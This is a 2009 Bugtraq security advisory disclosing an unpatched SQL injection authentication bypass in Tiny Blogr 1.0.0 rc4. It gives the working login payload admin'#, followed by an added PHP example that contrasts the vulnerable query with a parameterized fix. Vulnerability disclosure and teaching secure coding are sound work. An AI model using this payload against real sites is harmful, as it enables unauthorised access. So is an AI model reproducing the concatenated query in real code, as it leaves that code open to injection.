Bugtraq mailing list archives
Tiny Blogr 1.0.0 rc4 Authentication Bypass
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx () gmail com>
Date: Fri, 17 Apr 2009 14:30:46 +0200
*******   Salvatore "drosophila" Fresta   *******

[+] Application: Tiny Blogr
[+] Version: 1.0.0 rc4
[+] Website: http://tinyblogr.sourceforge.net

[+] Bugs: [A] Authentication Bypass

[+] Exploitation: Remote
[+] Date: 17 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx () gmail com

*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix

*************************************************

[+] Bugs

- [A] Authentication Bypass

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: class.eport.php

This bug allows a guest to bypass the authentication system.

*************************************************

[+] Code

- [A] Authentication Bypass

Username: admin'#
Password: foo

*************************************************

[+] Fix

No fix.

*************************************************

--
Salvatore "drosophila" Fresta
CWNP444351
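
The login pattern this report implies, next to a parameterized form, as an added example that is not from the advisory or from Tiny Blogr's source. The `users` table, its columns and both function names are assumptions, and an in-memory SQLite database stands in for the application's database.

```php
<?php
// Added illustration. Table, column and function names are assumptions;
// this is not code from Tiny Blogr's class.eport.php.

// Assumed vulnerable pattern: request values concatenated into the SQL text.
// With magic_quotes_gpc = off the quote in the username arrives unescaped.
// The string is only built and printed here, never executed.
function build_login_sql_unsafe(string $user, string $pass): string
{
    return "SELECT id FROM users WHERE username = '$user' AND password = '$pass'";
}

// Hardened form: the username is a bound parameter, and the password is
// checked in PHP against a stored hash instead of inside the SQL text.
function login_safe(PDO $db, string $user, string $pass): bool
{
    $stmt = $db->prepare('SELECT password_hash FROM users WHERE username = ?');
    $stmt->execute([$user]);
    $hash = $stmt->fetchColumn();
    return is_string($hash) && password_verify($pass, $hash);
}

// Constructed sample data (requires the pdo_sqlite extension).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password_hash TEXT)');
$ins = $db->prepare('INSERT INTO users (username, password_hash) VALUES (?, ?)');
$ins->execute(['admin', password_hash('constructed-sample-password', PASSWORD_DEFAULT)]);

// The advisory's input. In MySQL, '#' starts a comment, so everything after
// it, including the password comparison, is dropped from the statement.
echo build_login_sql_unsafe("admin'#", 'foo'), PHP_EOL;

// The same input through the bound parameter is just an unknown username.
var_dump(login_safe($db, "admin'#", 'foo'));
var_dump(login_safe($db, 'admin', 'foo'));
var_dump(login_safe($db, 'admin', 'constructed-sample-password'));
```

With a bound parameter the result no longer depends on `magic_quotes_gpc`, which was removed in PHP 5.4.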